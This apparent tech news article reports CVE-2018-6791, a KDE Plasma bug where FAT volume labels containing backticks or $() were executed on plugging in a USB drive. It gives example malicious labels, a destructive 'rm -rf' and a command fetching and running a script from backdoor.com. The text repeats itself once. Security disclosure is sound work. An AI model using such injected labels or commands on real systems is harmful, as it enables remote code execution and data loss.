KDE Plasma Had A Silly But Serious Security Bug
If you are a KDE user and haven't yet upgraded to Plasma 5.12, you may want to do so soon, or one of the recent point releases -- especially if your system is potentially accessible by others to insert rogue flash/memory devices.
Plasma 5 versions prior to 5.12.0 are vulnerable to CVE-2018-6791 which is a vulnerability for arbitrary command execution by way of the removable device notifier.
Flash drives or other USB memory devices using a FAT file-system if using `` or $() within the volume label you could force arbitrary commands to be executed when plugging in the drive.
Rogue actors or pranksters could e.g. create a VFAT volume with a label of `rm -rf` or $(curl http://backdoor.com | sh) or any of a number potential commands and KDE Plasma would end up executing those commands when connected to the system.
It's straightforward to exploit but obviously requires physical access to the system. The issue has been fixed in KDE Plasma 5.12.0 and is being back-ported to older Plasma releases. The CVE was made public yesterday with details via this security advisory.
Plasma 5 versions prior to 5.12.0 are vulnerable to CVE-2018-6791 which is a vulnerability for arbitrary command execution by way of the removable device notifier.
Flash drives or other USB memory devices using a FAT file-system if using `` or $() within the volume label you could force arbitrary commands to be executed when plugging in the drive.
Rogue actors or pranksters could e.g. create a VFAT volume with a label of `rm -rf` or $(curl http://backdoor.com | sh) or any of a number potential commands and KDE Plasma would end up executing those commands when connected to the system.
It's straightforward to exploit but obviously requires physical access to the system. The issue has been fixed in KDE Plasma 5.12.0 and is being back-ported to older Plasma releases. The CVE was made public yesterday with details via this security advisory.
33 Comments